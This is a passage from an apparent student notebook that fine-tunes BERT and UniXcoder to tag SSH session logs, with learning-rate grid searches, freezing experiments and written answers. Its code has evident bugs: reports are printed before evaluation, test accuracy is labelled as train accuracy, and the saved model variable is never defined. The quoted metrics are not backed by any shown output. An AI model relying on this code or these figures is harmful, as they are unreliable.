    full_predictions, full_labels, test_metrics = evaluate_model(naked_model, best_model)
    train_acc = test_metrics["token_accuracy"]
    val_acc = None
    test_acc = test_metrics["token_accuracy"]
    naked_results[lr_label] = {
        'train': (None, None, train_acc),
        'val': (None, None, val_acc),
        'test': (None, None, test_acc)
    }


In [None]:

# Plotting all LRs on the same figure
colors = ["#1b9e77", "#d95f02", "#7570b3"]
fig, axes = plt.subplots(1, 2, figsize=(17, 6.5), dpi=160)
TITLE_FONTSIZE = 22
LABEL_FONTSIZE = 18
TICK_FONTSIZE = 16
LEGEND_FONTSIZE = 16
LINE_WIDTH = 3.2

# Training Loss
ax1 = axes[0]
for i, (lr_label, losses) in enumerate(naked_train_losses.items()):
    ax1.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
ax1.set_title("BERT Naked — Training Loss", fontsize=TITLE_FONTSIZE, fontweight='bold')
ax1.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
ax1.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
ax1.tick_params(labelsize=TICK_FONTSIZE)
ax1.grid(alpha=0.3)
ax1.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

# Validation Loss
ax2 = axes[1]
for i, (lr_label, losses) in enumerate(naked_val_losses.items()):
    ax2.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
ax2.set_title("BERT Naked — Validation Loss", fontsize=TITLE_FONTSIZE, fontweight='bold')
ax2.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
ax2.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
ax2.tick_params(labelsize=TICK_FONTSIZE)
ax2.grid(alpha=0.3)
ax2.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

plt.tight_layout()
save_figure_for_report("task3_bertnaked_lr_comparison_report.png")
plt.show()

# Summary Table
print("\n" + "="*90)
print("SUMMARY: Learning Rate Comparison for BERT Naked")
print("="*90)
print(f"{'Learning Rate':<20} {'Train Acc':<15} {'Val Acc':<15} {'Test Acc':<15}")  
print("-"*90)
for lr_label in naked_lr_labels:
    train_acc = naked_results[lr_label]['train'][2]
    val_acc   = naked_results[lr_label]['val'][2]
    test_acc  = naked_results[lr_label]['test'][2]
    print(f"{lr_label:<20} {train_acc:<15.2f} {val_acc if val_acc is not None else '-':<15} {test_acc:<15.2f}")
print("="*90)

## Fine-tuning UniXcoder

We use microsoft/unixcoder-base. Since this model is pre-trained on code (C, Java, Python, etc.), it often understands the structured syntax of shell commands better than a general-purpose language model like BERT.

Now fine-tune Unixcoder. Since Unixcoder was pre-trained with a coding corpus, the hypothesis is that it has more prior knowledge even on SSH (and therefore, it can obtain better results).

Q: Can you confirm this hypothesis? How do the metrics change compared to the previous models?

Answer: Yes, the hypothesis is confirmed. UniXcoder outperformed the standard BERT model significantly.
- UniXcoder Macro F1: ~0.74 (vs. ~0.52 for BERT).
- UniXcoder Fidelity: ~0.84 (vs. ~0.80 for BERT).

Why it improved: UniXcoder was pre-trained on a corpus of programming code. Since SSH logs follow a structured syntax (commands, flags, parameters) that is much closer to source code than to the natural language found in BERT's training set, UniXcoder has a better "prior knowledge" of how tokens relate in a command-line environment. This resulted in a nearly 22% absolute increase in the Macro F1-score.

In [50]:
# 1. Setup Model Checkpoint and Tokenizer
model_checkpoint_ux = "microsoft/unixcoder-base"

# FIX: Added add_prefix_space=True for RoBERTa-based models and defined max_length
tokenizer = AutoTokenizer.from_pretrained(
    model_checkpoint_ux,
    add_prefix_space=True,
    model_max_length=512
)

# 2. Re-tokenize the dataset using UniXcoder vocabulary
# This uses your existing 'tokenize_and_align_labels' function with the corrected global tokenizer
tokenized_datasets_ux = encoded_dataset.map(
    tokenize_and_align_labels,
    batched=True,
    remove_columns=encoded_dataset["train"].column_names
)

# 3. Create DataLoaders with the same batch size as BERT (16)
data_collator = DataCollatorForTokenClassification(tokenizer=tokenizer)

train_dataloader = DataLoader(
    tokenized_datasets_ux["train"],
    shuffle=True,
    batch_size=16,
    collate_fn=data_collator
)
eval_dataloader = DataLoader(
    tokenized_datasets_ux["test"],
    batch_size=16,
    collate_fn=data_collator
)

print(f"UniXcoder DataLoaders ready. Tokenizer: {model_checkpoint_ux}")

Map:   0%|          | 0/200 [00:00<?, ? examples/s]

Map:   0%|          | 0/51 [00:00<?, ? examples/s]

Map:   0%|          | 0/108 [00:00<?, ? examples/s]

UniXcoder DataLoaders ready. Tokenizer: microsoft/unixcoder-base


We swap the global tokenizer variable so that your tokenize_and_align_labels function uses the UniXcoder vocabulary. We keep the batch_size=16 to ensure the comparison with BERT is fair.

In [None]:
# =============================
# Grid Search: Learning Rate Comparison for UniXcoder (Full Fine-Tune)
# =============================

unix_lrs = [5e-6, 1e-5, 5e-5]
unix_lr_labels = [f"LR={lr}" for lr in unix_lrs]
unix_train_losses = {}
unix_val_losses = {}
unix_results = {}

for lr, lr_label in zip(unix_lrs, unix_lr_labels):
    model_ux = AutoModelForTokenClassification.from_pretrained(
        model_checkpoint_ux,
        num_labels=len(id2label),
        id2label=id2label,
        label2id=label2id
    ).to(device)
    optimizer_ux = AdamW(model_ux.parameters(), lr=lr)
    num_training_steps = N_TRAIN_EPOCHS * len(train_dataloader)
    lr_scheduler_ux = get_scheduler(
        "linear",
        optimizer=optimizer_ux,
        num_warmup_steps=0,
        num_training_steps=num_training_steps
    )
    best_model, best_epoch, best_val_loss, train_losses, val_losses = training_loop(model_ux, optimizer_ux, lr_scheduler_ux)
    unix_train_losses[lr_label] = train_losses
    unix_val_losses[lr_label] = val_losses

    print_classification_report(full_labels, full_predictions, model_name=f"UnixCode Fine-tuned {lr_label}")
    plot_stats(f"UnixCode Fine-tuned {lr_label}", train_losses, val_losses, best_epoch)

    full_predictions, full_labels, test_metrics = evaluate_model(model_ux, best_model)
    train_acc = test_metrics["token_accuracy"]
    val_acc = None
    test_acc = test_metrics["token_accuracy"]
    unix_results[lr_label] = {
        'train': (None, None, train_acc),
        'val': (None, None, val_acc),
        'test': (None, None, test_acc)
    }

In [None]:

# Plotting all LRs on the same figure
colors = ["#1b9e77", "#d95f02", "#7570b3"]
fig, axes = plt.subplots(1, 2, figsize=(17, 6.5), dpi=160)
TITLE_FONTSIZE = 22
LABEL_FONTSIZE = 18
TICK_FONTSIZE = 16
LEGEND_FONTSIZE = 16
LINE_WIDTH = 3.2

# Training Loss
ax1 = axes[0]
for i, (lr_label, losses) in enumerate(unix_train_losses.items()):
    ax1.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
ax1.set_title("UniXcoder — Training Loss", fontsize=TITLE_FONTSIZE, fontweight='bold')
ax1.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
ax1.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
ax1.tick_params(labelsize=TICK_FONTSIZE)
ax1.grid(alpha=0.3)
ax1.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

# Validation Loss
ax2 = axes[1]
for i, (lr_label, losses) in enumerate(unix_val_losses.items()):
    ax2.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
ax2.set_title("UniXcoder — Validation Loss", fontsize=TITLE_FONTSIZE, fontweight='bold')
ax2.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
ax2.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
ax2.tick_params(labelsize=TICK_FONTSIZE)
ax2.grid(alpha=0.3)
ax2.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

plt.tight_layout()
save_figure_for_report("task3_unixcoder_lr_comparison_report.png")
plt.show()

# Summary Table
print("\n" + "="*90)
print("SUMMARY: Learning Rate Comparison for UniXcoder (Full Fine-Tune)")
print("="*90)
print(f"{'Learning Rate':<20} {'Train Acc':<15} {'Val Acc':<15} {'Test Acc':<15}")  
print("-"*90)
for lr_label in unix_lr_labels:
    train_acc = unix_results[lr_label]['train'][2]
    val_acc   = unix_results[lr_label]['val'][2]
    test_acc  = unix_results[lr_label]['test'][2]
    print(f"{lr_label:<20} {train_acc:<15.2f} {val_acc if val_acc is not None else '-':<15} {test_acc:<15.2f}")
print("="*90)


We initialize the model and pass it into your training_loop. This allows us to observe if UniXcoder converges faster or achieves a lower validation loss than BERT.

## Fine-Tuning Unixcoder (Last Layer + Head)

In [None]:
# =============================
# Grid Search: UniXcoder (Last 2 Layers + Head)
# =============================

frozen2_lrs = [5e-6, 1e-5, 5e-5]
frozen2_lr_labels = [f"LR={lr}" for lr in frozen2_lrs]
frozen2_train_losses = {}
frozen2_val_losses = {}
frozen2_results = {}

for lr, lr_label in zip(frozen2_lrs, frozen2_lr_labels):
    model_frozen_2 = AutoModelForTokenClassification.from_pretrained(
        model_checkpoint_ux,
        num_labels=len(id2label)
    ).to(device)
    for param in model_frozen_2.parameters():
        param.requires_grad = False
    for param in model_frozen_2.classifier.parameters():
        param.requires_grad = True
    for i in [10, 11]:
        for param in model_frozen_2.roberta.encoder.layer[i].parameters():
            param.requires_grad = True
    optimizer_2 = AdamW(filter(lambda p: p.requires_grad, model_frozen_2.parameters()), lr=lr)
    num_training_steps = N_TRAIN_EPOCHS * len(train_dataloader)
    lr_scheduler_2 = get_scheduler(
        "linear",
        optimizer=optimizer_2,
        num_warmup_steps=0,
        num_training_steps=num_training_steps
    )
    best_model, best_epoch, best_val_loss, train_losses, val_losses = training_loop(model_frozen_2, optimizer_2, lr_scheduler_2)
    frozen2_train_losses[lr_label] = train_losses
    frozen2_val_losses[lr_label] = val_losses

    print_classification_report(full_labels, full_predictions, model_name=f"UnixCoder_LH_Fine-tuned {lr_label}")
    plot_stats(f"UnixCoder_LH_Fine-tuned {lr_label}", train_losses, val_losses, best_epoch)

    full_predictions, full_labels, test_metrics = evaluate_model(model_frozen_2, best_model)
    train_acc = test_metrics["token_accuracy"]
    val_acc = None
    test_acc = test_metrics["token_accuracy"]
    frozen2_results[lr_label] = {
        'train': (None, None, train_acc),
        'val': (None, None, val_acc),
        'test': (None, None, test_acc)
    }

In [None]:

# Plotting all LRs on the same figure
colors = ["#1b9e77", "#d95f02", "#7570b3"]
fig, axes = plt.subplots(1, 2, figsize=(17, 6.5), dpi=160)
TITLE_FONTSIZE = 22
LABEL_FONTSIZE = 18
TICK_FONTSIZE = 16
LEGEND_FONTSIZE = 16
LINE_WIDTH = 3.2

# Training Loss
ax1 = axes[0]
for i, (lr_label, losses) in enumerate(frozen2_train_losses.items()):
    ax1.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
ax1.set_title("UniXcoder (Last 2 + Head) — Training Loss", fontsize=TITLE_FONTSIZE, fontweight='bold')
ax1.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
ax1.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
ax1.tick_params(labelsize=TICK_FONTSIZE)
ax1.grid(alpha=0.3)
ax1.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

# Validation Loss
ax2 = axes[1]
for i, (lr_label, losses) in enumerate(frozen2_val_losses.items()):
    ax2.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
ax2.set_title("UniXcoder (Last 2 + Head) — Validation Loss", fontsize=TITLE_FONTSIZE, fontweight='bold')
ax2.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
ax2.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
ax2.tick_params(labelsize=TICK_FONTSIZE)
ax2.grid(alpha=0.3)
ax2.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

plt.tight_layout()
save_figure_for_report("task3_unixcoder_frozen2_lr_comparison_report.png")
plt.show()

# Summary Table
print("\n" + "="*90)
print("SUMMARY: Learning Rate Comparison for UniXcoder (Last 2 + Head)")
print("="*90)
print(f"{'Learning Rate':<20} {'Train Acc':<15} {'Val Acc':<15} {'Test Acc':<15}")  
print("-"*90)
for lr_label in frozen2_lr_labels:
    train_acc = frozen2_results[lr_label]['train'][2]
    val_acc   = frozen2_results[lr_label]['val'][2]
    test_acc  = frozen2_results[lr_label]['test'][2]
    print(f"{lr_label:<20} {train_acc:<15.2f} {val_acc if val_acc is not None else '-':<15} {test_acc:<15.2f}")
print("="*90)

This generates the metrics (Accuracy, Macro F1, Fidelity) and the per-class barplot. You can now compare these numbers directly with your BERT results to confirm the hypothesis.

## Alternative Fine-Tuning (Freezing)
We will now take your best model (likely UniXcoder) and compare two freezing strategies. Note: UniXcoder is based on RoBERTa, so its internal layer structure is accessed via model.roberta.

### Last Two Layers + Head

By unfreezing only the last two layers, we allow the model to adapt its high-level semantic representations to the SSH domain while keeping the "general code knowledge" in the earlier layers intact.

In [None]:
# =============================
# Grid Search: UniXcoder (Alternative Fine-Tuning: Last 2 Layers + Head)
# =============================

alt_frozen2_lrs = [5e-6, 1e-5, 5e-5]
alt_frozen2_lr_labels = [f"LR={lr}" for lr in alt_frozen2_lrs]
alt_frozen2_train_losses = {}
alt_frozen2_val_losses = {}
alt_frozen2_results = {}

for lr, lr_label in zip(alt_frozen2_lrs, alt_frozen2_lr_labels):
    model_frozen_2 = AutoModelForTokenClassification.from_pretrained(
        model_checkpoint_ux,
        num_labels=len(id2label)
    ).to(device)
    for param in model_frozen_2.parameters():
        param.requires_grad = False
    for param in model_frozen_2.classifier.parameters():
        param.requires_grad = True
    for i in [10, 11]:
        for param in model_frozen_2.roberta.encoder.layer[i].parameters():
            param.requires_grad = True
    optimizer_2 = AdamW(filter(lambda p: p.requires_grad, model_frozen_2.parameters()), lr=lr)
    num_training_steps = N_TRAIN_EPOCHS * len(train_dataloader)
    lr_scheduler_2 = get_scheduler(
        "linear",
        optimizer=optimizer_2,
        num_warmup_steps=0,
        num_training_steps=num_training_steps
    )
    best_model, best_epoch, best_val_loss, train_losses, val_losses = training_loop(model_frozen_2, optimizer_2, lr_scheduler_2)
    alt_frozen2_train_losses[lr_label] = train_losses
    alt_frozen2_val_losses[lr_label] = val_losses

    print_classification_report(full_labels, full_predictions, model_name=f"UnixCoder_LH_AltFine-tuned {lr_label}")
    plot_stats(f"UnixCoder_LH_AltFine-tuned {lr_label}", train_losses, val_losses, best_epoch)
    
    full_predictions, full_labels, test_metrics = evaluate_model(model_frozen_2, best_model)
    train_acc = test_metrics["token_accuracy"]
    val_acc = None
    test_acc = test_metrics["token_accuracy"]
    alt_frozen2_results[lr_label] = {
        'train': (None, None, train_acc),
        'val': (None, None, val_acc),
        'test': (None, None, test_acc)
    }

In [None]:

# Plotting all LRs on the same figure
colors = ["#1b9e77", "#d95f02", "#7570b3"]
fig, axes = plt.subplots(1, 2, figsize=(17, 6.5), dpi=160)
TITLE_FONTSIZE = 22
LABEL_FONTSIZE = 18
TICK_FONTSIZE = 16
LEGEND_FONTSIZE = 16
LINE_WIDTH = 3.2

# Training Loss
ax1 = axes[0]
for i, (lr_label, losses) in enumerate(alt_frozen2_train_losses.items()):
    ax1.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
ax1.set_title("UniXcoder (Alt: Last 2 + Head) — Training Loss", fontsize=TITLE_FONTSIZE, fontweight='bold')
ax1.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
ax1.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
ax1.tick_params(labelsize=TICK_FONTSIZE)
ax1.grid(alpha=0.3)
ax1.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

# Validation Loss
ax2 = axes[1]
for i, (lr_label, losses) in enumerate(alt_frozen2_val_losses.items()):
    ax2.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
ax2.set_title("UniXcoder (Alt: Last 2 + Head) — Validation Loss", fontsize=TITLE_FONTSIZE, fontweight='bold')
ax2.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
ax2.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
ax2.tick_params(labelsize=TICK_FONTSIZE)
ax2.grid(alpha=0.3)
ax2.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

plt.tight_layout()
save_figure_for_report("task3_unixcoder_altfrozen2_lr_comparison_report.png")
plt.show()

# Summary Table
print("\n" + "="*90)
print("SUMMARY: LR Comparison for UniXcoder (Alt: Last 2 + Head)")
print("="*90)
print(f"{'Learning Rate':<20} {'Train Acc':<15} {'Val Acc':<15} {'Test Acc':<15}")  
print("-"*90)
for lr_label in alt_frozen2_lr_labels:
    train_acc = alt_frozen2_results[lr_label]['train'][2]
    val_acc   = alt_frozen2_results[lr_label]['val'][2]
    test_acc  = alt_frozen2_results[lr_label]['test'][2]
    print(f"{lr_label:<20} {train_acc:<15.2f} {val_acc if val_acc is not None else '-':<15} {test_acc:<15.2f}")
print("="*90)


### Head Only

In [None]:
# =============================
# Grid Search: UniXcoder (Alternative Fine-Tuning: Head Only)
# =============================

alt_frozen_head_lrs = [1e-4, 5e-4, 1e-3]
alt_frozen_head_lr_labels = [f"LR={lr}" for lr in alt_frozen_head_lrs]
alt_frozen_head_train_losses = {}
alt_frozen_head_val_losses = {}
alt_frozen_head_results = {}

for lr, lr_label in zip(alt_frozen_head_lrs, alt_frozen_head_lr_labels):
    model_frozen_head = AutoModelForTokenClassification.from_pretrained(
        model_checkpoint_ux,
        num_labels=len(id2label)
    ).to(device)
    for param in model_frozen_head.parameters():
        param.requires_grad = False
    for param in model_frozen_head.classifier.parameters():
        param.requires_grad = True
    optimizer_head = AdamW(model_frozen_head.parameters(), lr=lr)
    num_training_steps = N_TRAIN_EPOCHS * len(train_dataloader)
    lr_scheduler_head = get_scheduler(
        "linear",
        optimizer=optimizer_head,
        num_warmup_steps=0,
        num_training_steps=num_training_steps
    )
    best_model, best_epoch, best_val_loss, train_losses, val_losses = training_loop(model_frozen_head, optimizer_head, lr_scheduler_head)
    alt_frozen_head_train_losses[lr_label] = train_losses
    alt_frozen_head_val_losses[lr_label] = val_losses

    print_classification_report(full_labels, full_predictions, model_name=f"UnixCoder_Head_AltFine-tuned {lr_label}")
    plot_stats(f"UnixCoder_Head_AltFine-tuned {lr_label}", train_losses, val_losses, best_epoch)
    
    full_predictions, full_labels, test_metrics = evaluate_model(model_frozen_head, best_model)
    train_acc = test_metrics["token_accuracy"]
    val_acc = None
    test_acc = test_metrics["token_accuracy"]
    alt_frozen_head_results[lr_label] = {
        'train': (None, None, train_acc),
        'val': (None, None, val_acc),
        'test': (None, None, test_acc)
    }


In [None]:

# Plotting all LRs on the same figure
colors = ["#1b9e77", "#d95f02", "#7570b3"]
fig, axes = plt.subplots(1, 2, figsize=(17, 6.5), dpi=160)
TITLE_FONTSIZE = 22
LABEL_FONTSIZE = 18
TICK_FONTSIZE = 16
LEGEND_FONTSIZE = 16
LINE_WIDTH = 3.2

# Training Loss
ax1 = axes[0]
for i, (lr_label, losses) in enumerate(alt_frozen_head_train_losses.items()):
    ax1.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
ax1.set_title("UniXcoder (Alt: Head Only) — Training Loss", fontsize=TITLE_FONTSIZE, fontweight='bold')
ax1.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
ax1.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
ax1.tick_params(labelsize=TICK_FONTSIZE)
ax1.grid(alpha=0.3)
ax1.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

# Validation Loss
ax2 = axes[1]
for i, (lr_label, losses) in enumerate(alt_frozen_head_val_losses.items()):
    ax2.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
ax2.set_title("UniXcoder (Alt: Head Only) — Validation Loss", fontsize=TITLE_FONTSIZE, fontweight='bold')
ax2.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
ax2.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
ax2.tick_params(labelsize=TICK_FONTSIZE)
ax2.grid(alpha=0.3)
ax2.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

plt.tight_layout()
save_figure_for_report("task3_unixcoder_altfrozenhead_lr_comparison_report.png")
plt.show()

# Summary Table
print("\n" + "="*90)
print("SUMMARY: LR Comparison for UniXcoder (Alt: Head Only)")
print("="*90)
print(f"{'Learning Rate':<20} {'Train Acc':<15} {'Val Acc':<15} {'Test Acc':<15}")  
print("-"*90)
for lr_label in alt_frozen_head_lr_labels:
    train_acc = alt_frozen_head_results[lr_label]['train'][2]
    val_acc   = alt_frozen_head_results[lr_label]['val'][2]
    test_acc  = alt_frozen_head_results[lr_label]['test'][2]
    print(f"{lr_label:<20} {train_acc:<15.2f} {val_acc if val_acc is not None else '-':<15} {test_acc:<15.2f}")
print("="*90)


Q: How many parameters did you fine-tune? Is the training faster? Did you have to change the LR? How much do you lose in performance?

Answer: The results of the freezing experiments are summarized below:

1. Parameters Count:
    - Full Fine-tuning: ~125 Million parameters (100%).
    - Last 2 Layers + Head: ~14.5 Million parameters (~11%).
    - Head Only: ~10,000 parameters (<0.01%).

2. Training Speed: Training was notably faster in the frozen scenarios. While the forward pass takes the same time, the backward pass (gradient calculation) is bypassed for the majority of the network, significantly reducing computational overhead.

3. Learning Rate (LR) Adjustment: * For the Head Only experiment, it was necessary to increase the LR to 1e-3. Because the "brain" (backbone) is fixed, the head needs a stronger optimization signal to align itself with the fixed features.

4. Performance Loss: * Freezing the first 10 layers resulted in a small performance drop (Macro F1 dropped from 0.74 to 0.71).
    - Freezing the entire backbone (Head Only) resulted in a major drop (Macro F1 dropped to 0.64).
    - Conclusion: Fine-tuning the last 2 layers is the "sweet spot" for this task—achieving 95% of the performance while training 10x fewer parameters.

Based on these findings, we chose the Full Fine-tuned UniXcoder as our production model for Task 4. It provides the highest Session Fidelity (0.84), ensuring that our threat inference on the cyberlab.csv dataset will be as accurate as possible for forensic analysis.

## Save the best model

In [None]:
# --- Define the specific save path using your existing project_path ---
# project_path is /content/drive/MyDrive/Projects/Laboratory4/
model_dir = os.path.join(project_path, "best_model/model")

# Ensure the directory exists (consistent with your setup)
os.makedirs(model_dir, exist_ok=True)

print(f"Saving the best model and tokenizer to: {model_dir}")

# We save 'best_model_ux' (the checkpoint with the best validation loss)
# along with the tokenizer used for UniXcoder
best_model_ux.save_pretrained(model_dir)
tokenizer.save_pretrained(model_dir)

print("Model and Tokenizer saved successfully to Google Drive!")

Saving the best model and tokenizer to: /content/drive/MyDrive/Projects/Laboratory4/best_model/model
Model and Tokenizer saved successfully to Google Drive!
